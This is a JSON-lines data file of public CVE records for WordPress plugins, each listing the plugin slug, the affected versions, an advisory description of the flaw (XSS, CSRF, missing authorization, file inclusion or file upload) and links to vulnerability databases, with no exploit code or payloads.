{"CVE_ID":"CVE-2024-1534","slug":"woocommerce-jetpack","versionImpact":"7.1.7","description":"The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 7.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56dc5138-c864-4e36-8b7d-38ac49589c06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56dc5138-c864-4e36-8b7d-38ac49589c06?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3046146%40woocommerce-jetpack%2Ftrunk&old=3034358%40woocommerce-jetpack%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3046146%40woocommerce-jetpack%2Ftrunk&old=3034358%40woocommerce-jetpack%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0892","slug":"schema-app-structured-data-for-schemaorg","versionImpact":"2.2.0","description":"The Schema App Structured Data plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.0. This is due to missing or incorrect nonce validation on the MarkUpdate function. This makes it possible for unauthenticated attackers to update and delete post metadata via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/254291b3-a30d-44ff-9df4-6ba700a9efc9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/254291b3-a30d-44ff-9df4-6ba700a9efc9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/schema-app-structured-data-for-schemaorg\\\/trunk\\\/lib\\\/SchemaEditor.php#L327\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/schema-app-structured-data-for-schemaorg\\\/trunk\\\/lib\\\/SchemaEditor.php#L327\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-38345","slug":"sola-testimonials","description":"A cross-site request forgery vulnerability exists in Sola Testimonials versions prior to 3.0.0. If this vulnerability is exploited, an attacker allows a user who logs in to the WordPress site where the affected plugin is enabled to access a malicious page. As a result, the user may perform unintended operations on the WordPress site.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sola-testimonials\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sola-testimonials\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN34977158\\\/\",\"name\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN34977158\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9028","slug":"wp-gpx-maps","versionImpact":"1.7.08","description":"The WP GPX Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sgpx' shortcode in all versions up to, and including, 1.7.08 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/872c8328-9089-4bc0-af17-f755524da610?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/872c8328-9089-4bc0-af17-f755524da610?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-gpx-maps\\\/trunk\\\/wp-gpx-maps.php#L238\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-gpx-maps\\\/trunk\\\/wp-gpx-maps.php#L238\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-gpx-maps\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-gpx-maps\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-gpx-maps\\\/trunk\\\/wp-gpx-maps-admin-tracks.php#L249\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-gpx-maps\\\/trunk\\\/wp-gpx-maps-admin-tracks.php#L249\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11905","slug":"animated-counters","versionImpact":"2.0","description":"The Animated Counters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'animatedcounte' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/animated-counters\\\/trunk\\\/animated-counters.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/animated-counters\\\/trunk\\\/animated-counters.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/animated-counters\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/animated-counters\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afd2f09c-4bd5-47a5-8d4f-7345aa8925f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afd2f09c-4bd5-47a5-8d4f-7345aa8925f8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13352","slug":"legull","versionImpact":"1.2.2","description":"The Legull WordPress plugin through 1.2.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2c141cc0-f79e-42bd-97a6-98829647104c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2c141cc0-f79e-42bd-97a6-98829647104c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13826","slug":"email-keep","versionImpact":"1.1","description":"The Email Keep WordPress plugin through 1.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/56b143b6-e5db-4037-ab2a-4e4d0cb7a005\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/56b143b6-e5db-4037-ab2a-4e4d0cb7a005\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2266","slug":"checkout-mestres-wp","description":"The Checkout Mestres do WP for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the cwmpUpdateOptions() function in versions 8.6.5 to 8.7.5. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/checkout-mestres-wp\\\/trunk\\\/backend\\\/core\\\/base\\\/ajax.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/checkout-mestres-wp\\\/trunk\\\/backend\\\/core\\\/base\\\/ajax.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/checkout-mestres-wp\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/checkout-mestres-wp\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9834fd5b-8445-4c6f-95f9-f0df785c65f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9834fd5b-8445-4c6f-95f9-f0df785c65f8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5018","slug":"hive-support","versionImpact":"1.2.4","description":"The Hive Support plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the hs_update_ai_chat_settings() and hive_lite_support_get_all_binbox() functions in all versions up to, and including, 1.2.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read and overwrite the site\u2019s OpenAI API key and inspection data or modify AI-chat prompts and behavior. This vulnerability is potentially a duplicate of CVE-2025-32208 or\/and CVE-2025-32242.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hive-support\\\/tags\\\/1.2.4\\\/backend\\\/class-hive-support-ajax.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hive-support\\\/tags\\\/1.2.4\\\/backend\\\/class-hive-support-ajax.php#L9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hive-support\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hive-support\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95c8722e-07c3-4728-8723-4d4a6188fe5e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95c8722e-07c3-4728-8723-4d4a6188fe5e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8059","slug":"b-blocks","versionImpact":"2.0.6","description":"The B Blocks plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization and improper input validation within the rgfr_registration() function in all versions up to, and including, 2.0.6. This makes it possible for unauthenticated attackers to create a new account and assign it the administrator role.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-blocks\\\/trunk\\\/includes\\\/blocks\\\/RegisterForm.php#L77\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-blocks\\\/trunk\\\/includes\\\/blocks\\\/RegisterForm.php#L77\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3340770\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3340770\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/b-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/b-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ee3b389-60c9-4f8e-9428-a71a6d9b20aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ee3b389-60c9-4f8e-9428-a71a6d9b20aa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4371","slug":"wp-quick-front-end-editor","versionImpact":"5.5.","description":"The WP Quick FrontEnd Editor plugin for WordPress is vulnerable to Setting Changs in versions up to, and including, 5.5. This is due to lacking both a security nonce and a capabilities check. This makes it possible for low-authenticated attackers to change plugin settings even when they do not have the capabilities to do so.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c392750b-ae4a-48b5-9ccb-43852fb13e27?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c392750b-ae4a-48b5-9ccb-43852fb13e27?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-quick-front-end-editor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-quick-front-end-editor\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-in-wordpress-wp-quick-frontend-editor-plugin-unpatched\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-in-wordpress-wp-quick-frontend-editor-plugin-unpatched\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4597","slug":"wp-slimstat","versionImpact":"5.0.9","description":"The Slimstat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'slimstat' shortcode in versions up to, and including, 5.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52aee4b8-f494-4eeb-8357-71ce8d5bc656?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52aee4b8-f494-4eeb-8357-71ce8d5bc656?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2959452%40wp-slimstat&new=2959452%40wp-slimstat&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2959452%40wp-slimstat&new=2959452%40wp-slimstat&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/tags\\\/5.0.9\\\/wp-slimstat.php#L892\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/tags\\\/5.0.9\\\/wp-slimstat.php#L892\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47833","slug":"theatre","versionImpact":"0.18.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jeroen Schmit Theater for WordPress plugin <=\u00a00.18.3 versions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/theatre\\\/wordpress-theater-for-wordpress-plugin-0-18-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/theatre\\\/wordpress-theater-for-wordpress-plugin-0-18-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6638","slug":"gg-woo-feed","versionImpact":"1.2.4","description":"The GTG Product Feed for Shopping plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_settings' function in versions up to, and including, 1.2.4. This makes it possible for unauthenticated attackers to update plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce6b9b0a-e82e-459a-bddf-1c9354bcec00?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce6b9b0a-e82e-459a-bddf-1c9354bcec00?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gg-woo-feed\\\/trunk\\\/inc\\\/Admin\\\/Admin.php?rev=2933599#L199\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gg-woo-feed\\\/trunk\\\/inc\\\/Admin\\\/Admin.php?rev=2933599#L199\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2136","slug":"wpkoi-templates-for-elementor","versionImpact":"2.5.6","description":"The WPKoi Templates for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Advanced Heading widget in all versions up to, and including, 2.5.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31f7ae51-2fb2-4311-bc78-7198d6e6b623?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31f7ae51-2fb2-4311-bc78-7198d6e6b623?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046089\\\/wpkoi-templates-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046089\\\/wpkoi-templates-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-38344","slug":"wp-tweet-walls","description":"A cross-site request forgery vulnerability exists in WP Tweet Walls versions prior to 1.0.4. If this vulnerability is exploited, an attacker allows a user who logs in to the WordPress site where the affected plugin is enabled to access a malicious page. As a result, the user may perform unintended operations on the WordPress site.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-tweet-walls\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-tweet-walls\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN34977158\\\/\",\"name\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN34977158\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9027","slug":"wpzoom-shortcodes","versionImpact":"1.0.5","description":"The WPZOOM Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'box' shortcode in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cc03aa9-ad3d-4abb-9c22-cb40875ece47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cc03aa9-ad3d-4abb-9c22-cb40875ece47?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpzoom-shortcodes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpzoom-shortcodes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpzoom-shortcodes\\\/trunk\\\/shortcodes\\\/shortcodes.php#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpzoom-shortcodes\\\/trunk\\\/shortcodes\\\/shortcodes.php#L38\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10436","slug":"wpc-smart-messages","versionImpact":"4.2.1","description":"The WPC Smart Messages for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.2.1 via the get_condition_value function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fd87512-def0-4e59-aa2d-b166919474f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fd87512-def0-4e59-aa2d-b166919474f3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpc-smart-messages\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpc-smart-messages\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpc-smart-messages\\\/tags\\\/4.2.1\\\/includes\\\/class-backend.php#L418\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpc-smart-messages\\\/tags\\\/4.2.1\\\/includes\\\/class-backend.php#L418\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3177426\\\/wpc-smart-messages\\\/trunk\\\/includes\\\/class-backend.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3177426\\\/wpc-smart-messages\\\/trunk\\\/includes\\\/class-backend.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12026","slug":"cf7-message-filter","versionImpact":"1.6.3","description":"The Message Filter for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the saveFilter() function in all versions up to, and including, 1.6.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new filters.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf7-message-filter\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf7-message-filter\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e7044aa-a1e7-4b1d-9f50-5e250426c6b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e7044aa-a1e7-4b1d-9f50-5e250426c6b0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11902","slug":"slope-widgets","versionImpact":"4.2.11","description":"The Slope Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'slope-reservations' shortcode in all versions up to, and including, 4.2.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slope-widgets\\\/trunk\\\/slope-reservations.php#L298\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slope-widgets\\\/trunk\\\/slope-reservations.php#L298\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slope-widgets\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slope-widgets\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7700f1f3-90e2-450d-9cfe-c922d0cc6a1e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7700f1f3-90e2-450d-9cfe-c922d0cc6a1e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1510","slug":"custom-post-type-date-archives","versionImpact":"2.7.1","description":"The The Custom Post Type Date Archives plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.7.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-post-type-date-archives\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-post-type-date-archives\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996ade9c-2531-4f43-87f6-eddb2ce98a12?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996ade9c-2531-4f43-87f6-eddb2ce98a12?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13825","slug":"email-keep","versionImpact":"1.1","description":"The Email Keep WordPress plugin through 1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/368474a0-550d-49f8-855d-b2010f8b91b5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/368474a0-550d-49f8-855d-b2010f8b91b5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2249","slug":"soj-soundslides","versionImpact":"1.2.2","description":"The SoJ SoundSlides plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the soj_soundslides_options_subpanel() function in all versions up to, and including, 1.2.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/soj-soundslides\\\/tags\\\/1.2.2\\\/soj-soundslides.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/soj-soundslides\\\/tags\\\/1.2.2\\\/soj-soundslides.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f648e7f3-d93a-4a46-ae77-81a94880869c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f648e7f3-d93a-4a46-ae77-81a94880869c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12874","slug":"top-comments","versionImpact":"1.0","description":"The Top Comments WordPress plugin through 1.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7cc14a87-4605-49f6-9d51-0b9eb57e6c9d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7cc14a87-4605-49f6-9d51-0b9eb57e6c9d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4966","slug":"wp-online-users-stats","versionImpact":"1.0.0","description":"The WP Online Users Stats plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing nonce validation within the hk_dataset_results() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a 